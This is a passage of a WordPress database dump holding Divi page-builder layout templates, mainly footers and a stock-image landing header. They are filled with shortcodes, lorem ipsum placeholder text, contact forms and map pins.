use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||40px|\" custom_margin_tablet=\"||20px|\" custom_margin_last_edited=\"on|tablet\"]</p><p>Get In Touch</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"510px\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_tablet=\"18\"]</p><p>Sed ut perspiciatis unde omnis iste natus errorae sit voluptatem accusa antium.</p><p>[/et_pb_text][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"rgba(249,249,249,0.21)\" input_border_radius=\"3\" title_text_color=\"#ffffff\" form_field_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_letter_spacing=\"1\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_letter_spacing_hover=\"0\" title_font=\"Source Sans Pro||||\" title_font_size=\"18\" form_field_font=\"Source Sans Pro||||\" form_field_font_size=\"18\" button_text_size=\"18\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_font=\"Montserrat||||\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d94b6a\" button_border_color_hover=\"#d94b6a\" button_border_radius=\"4\" button_border_radius_hover=\"4\" button_border_width=\"4\" button_border_color=\"#d94b6a\"] [et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"off\" /][et_pb_contact_field field_title=\"Message\" field_type=\"text\" field_id=\"Message\" required_mark=\"on\" /] [/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"50px||50px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Raleway|on|||\" text_font_size=\"28\" text_text_color=\"#ffffff\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\" custom_css_main_element=\"font-weight: 900;\"]</p><p>maker</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"16\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" max_width=\"300px\" custom_margin=\"||30px|\" custom_margin_tablet=\"||10px|\" custom_margin_last_edited=\"on|tablet\"]</p><p>Maecenas eu placerat ante. Fusce ut neque justo, aliquet enim. In hac habitasse platea aumst. Nullam commodo au erat.</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"12\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" max_width=\"300px\"]</p><p>© 2016 Maker Pty Ltd.</p><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"18\" text_text_color=\"#666666\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||8px|\"]</p><p>MEET MAKER</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" text_line_height=\"2.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\"]</p><p><span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">About Maker</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Explore our Ecosystem</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Careers</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Community Meetups</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Help Center</a></span><br /> <span style=\"color: #ffffff\"><a style=\"color: #ffffff\" href=\"#\">Contact Us</a></span></p><p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"18\" text_text_color=\"#666666\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||24px|\"]</p><p>GOOGLE MAP</p><p>[/et_pb_text][et_pb_map admin_label=\"Map\" zoom_level=\"19\" address_lat=\"37.77471944614808\" address_lng=\"-122.4194490276127\" mouse_wheel=\"on\" use_grayscale_filter=\"off\"] [et_pb_map_pin pin_address=\"San Francisco, California, Stati Uniti\" pin_address_lat=\"37.7749295\" pin_address_lng=\"-122.41941550000001\"][/et_pb_map_pin] [/et_pb_map][/et_pb_column][/et_pb_row][/et_pb_section]</p>','Footer #8','','publish','closed','closed','','footer-8','','','2016-04-22 19:21:47','2016-04-22 17:21:47','',0,'https://companyregistration.online/et_pb_layout/footer-8/',0,'et_pb_layout','',0),(3904,1,'2016-04-22 19:21:53','2016-04-22 17:21:53','<p>[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"0px||0px|\"][et_pb_column type=\"4_4\"][et_pb_map admin_label=\"Map\" address=\"San Francisco, California, Stati Uniti\" zoom_level=\"10\" address_lat=\"37.77452423234229\" address_lng=\"-122.42045083267976\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"100\"]</p><p>[et_pb_map_pin pin_address=\"10 S Van Ness Ave, San Francisco, CA 94103, Stati Uniti\" pin_address_lat=\"37.77447156129669\" pin_address_lng=\"-122.41969444973756\"][/et_pb_map_pin]</p><p>[/et_pb_map][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"50px||30px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" text_line_height=\"2.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" custom_margin=\"||49px|\"]</p><p><span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">HOME</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">BLOG </a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">PORTFOLIO</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">FEATURES</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">CONTACT</a></span></p><p>[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#666666\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]</p><p>[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"16\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"30px|||\" max_width=\"560px\" custom_margin=\"||30px|\" custom_margin_last_edited=\"on|tablet\" custom_margin_tablet=\"||10px|\"]</p><p>Maecenas eu placerat ante. Fusce ut neque justo, aliquet enim. In hac habitasse. Platea aumst. Nullam commodo au erat.</p><p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]</p>','Footer #9','','publish','closed','closed','','footer-9','','','2016-04-22 19:21:53','2016-04-22 17:21:53','',0,'https://companyregistration.online/et_pb_layout/footer-9/',0,'et_pb_layout','',0),(3905,1,'2016-04-22 19:21:58','2016-04-22 17:21:58','<p>[et_pb_section admin_label=\"section\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/051.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"1\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"132px||122px|\" custom_padding_tablet=\"100px||100px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"64\" text_font_size_tablet=\"46\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||10px|\" custom_margin_last_edited=\"on|desktop\" text_line_height=\"1.5em\"]</p><p>Did you like this?</p><p>[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"460px\" text_font=\"Source Sans Pro||||\" text_font_size=\"24\" text_font_size_last_edited=\"on|tablet\" text_text_color=\"#aaaaaa\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_tablet=\"18\" custom_margin=\"||21px|\"]</p><p>Lorem ipsum dolor sit amet, me consetur adipiscing elit, sed do eiusmod est tempor incididunt ut labore et dolore maqua.</p><p>[/et_pb_text][et_pb_button admin_label=\"Button\" url_new_window=\"off\" button_text=\"LEARN MORE\" button_alignment=\"center\" background_layout=\"light\" custom_button=\"on\" button_text_size=\"16\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_border_width=\"10\" button_border_color=\"#d94b6a\" button_border_radius=\"100\" button_letter_spacing=\"3\" button_font=\"Source Sans Pro|on|||\" button_use_icon=\"default\" button_icon_color=\"#ffffff\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d94b6a\" button_border_color_hover=\"#d94b6a\" button_border_radius_hover=\"100\" button_letter_spacing_hover=\"3\" custom_css_main_element=\"width:190px;\"] [/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#3c3d41\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"2\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding=\"50px||30px|\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" text_line_height=\"2.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"0px|||\" custom_margin=\"||49px|\"]</p><p><span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">HOME</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">BLOG </a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">PORTFOLIO</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">FEATURES</a></span> <span style=\"color: #ffffff;margin-right: 3%\"><a style=\"color: #ffffff\" href=\"#\">CONTACT</a></span></p><p>[/et_pb_text][et_pb_divider admin_label=\"Divider\" color=\"#666666\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"] [/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro||||\" text_font_size=\"16\" text_text_color=\"#aaaaaa\" text_line_height=\"1.5em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_padding=\"30px|||\" max_width=\"560px\" custom_margin=\"||30px|\" custom_margin_last_edited=\"on|tablet\" custom_margin_tablet=\"||10px|\"]</p><p>Maecenas eu placerat ante. Fusce ut neque justo, aliquet enim. In hac habitasse. Platea aumst. Nullam commodo au erat.</p><p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]</p>','Footer #10','','publish','closed','closed','','footer-10','','','2016-04-22 19:21:58','2016-04-22 17:21:58','',0,'https://companyregistration.online/et_pb_layout/footer-10/',0,'et_pb_layout','',0),(5070,1,'2016-05-16 21:19:38','2016-05-16 19:19:38','[et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Header #1\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"24\" text_text_color=\"#7a8a97\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">Hey Fellow! </span></p>\r\n\r\n[/et_pb_text][et_pb_text admin_label=\"Limited time offer. Get 10 free stock images.\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||\" text_font_size=\"5em\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" custom_margin=\"2%||2.5%|\" custom_css_main_element=\"font-weight: 400;\" text_font_size_tablet=\"3em\" text_font_size_last_edited=\"on|phone\" custom_margin_last_edited=\"on|phone\" custom_margin_tablet=\"2%||4.5%|\" text_font_size_phone=\"2em\"]\r\n\r\n<p>Limited time offer.<br /> Get 10 free stock images.</p>\r\n\r\n[/et_pb_text][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" email=\"Email Address\" use_redirect=\"off\" form_background_color=\"#3c4c5d\" input_border_radius=\"4\" title_font=\"Roboto||||\" form_field_font=\"Roboto||||\" form_field_font_size=\"18\" form_field_text_color=\"#89a3bd\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_size=\"18\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_bg_color_hover=\"#00bcd4\" button_border_color_hover=\"#00bcd4\" button_letter_spacing_hover=\"0\" custom_css_main_element=\"width:330px;\"]\r\n\r\n[et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"on\" input_border_radius=\"0\" form_field_font_select=\"default\" form_field_font=\"||||\" use_border_color=\"off\" border_style=\"solid\"][/et_pb_contact_field]\r\n\r\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"98px||90px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header #2\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" max_width=\"620px\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"TRUSTED AND USED BY MANY HUMANS AND COMPANIES\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Roboto||||\" text_text_color=\"#7a8a97\" text_letter_spacing=\"1px\" text_line_height=\"1.4em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n<p class=\"p1\"><span class=\"s1\">TRUSTED AND USED BY MANY HUMANS AND COMPANIES</span></p>\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"800px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"30px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\" parallax_4=\"off\" parallax_method_4=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/01_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/02_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/03_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/04_logo.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"fade_in\" sticky=\"on\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\"][et_pb_column type=\"4_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"24px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"off\"]\r\n\r\n\r\n\r\n[/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"160px||160px|\" custom_padding_last_edited=\"on|phone\"][et_pb_column type=\"4_4\"][et_pb_cta admin_label=\"Header #3\" title=\"We help humans to find the best stock images.\" url_new_window=\"off\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"center\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" button_on_hover=\"on\" button_border_color_hover=\"#00bcd4\" button_border_radius_hover=\"4\" button_letter_spacing_hover=\"1\" custom_css_promo_description=\"font-weight:400;\" custom_css_promo_button=\"margin-top:34px;\" button_text_size=\"15\" header_font_size_tablet=\"46\" header_font_size_phone=\"36\" max_width=\"620px\" custom_css_main_element=\"font-weight:400;\"]\r\n\r\n<p class=\"p1\">Yes, I’m a dummy text. Anyway I look nice and useful.</p>\r\n\r\n[/et_pb_cta][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/img_h1.png\" show_in_lightbox=\"off\" url=\"#\" url_new_window=\"off\" use_overlay=\"off\" hover_overlay_color=\"#00bcd4\" hover_icon=\"%%137%%\" animation=\"bottom\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\r\n\r\n\r\n\r\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/01_bg.jpg\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" disabled_on=\"on|on|on\" disabled=\"on\"][et_pb_row admin_label=\"row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" custom_width_px=\"500px\" use_custom_gutter=\"on\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" gutter_width=\"4\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" custom_padding=\"104px||104px|\" custom_padding_last_edited=\"on|desktop\" custom_padding_tablet=\"104px||60px|\"][et_pb_column type=\"1_2\"][et_pb_cta admin_label=\"Header #4\" title=\"Limited time offer. Get 10 free stock images.\" button_url=\"#\" url_new_window=\"off\" button_text=\"START NOW\" use_background_color=\"off\" background_color=\"#7EBEC5\" background_layout=\"dark\" text_orientation=\"left\" header_font=\"Roboto||||\" header_font_size=\"56\" header_font_size_last_edited=\"on|phone\" header_text_color=\"#ffffff\" header_line_height=\"1.3em\" body_font=\"Roboto||||\" body_font_size=\"20\" body_text_color=\"#00bcd4\" body_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#00bcd4\" button_border_width=\"8\" button_border_color=\"#00bcd4\" button_border_radius=\"4\" button_letter_spacing=\"1\" button_font=\"Roboto||||\" button_use_icon=\"off\" button_icon_placement=\"right\" 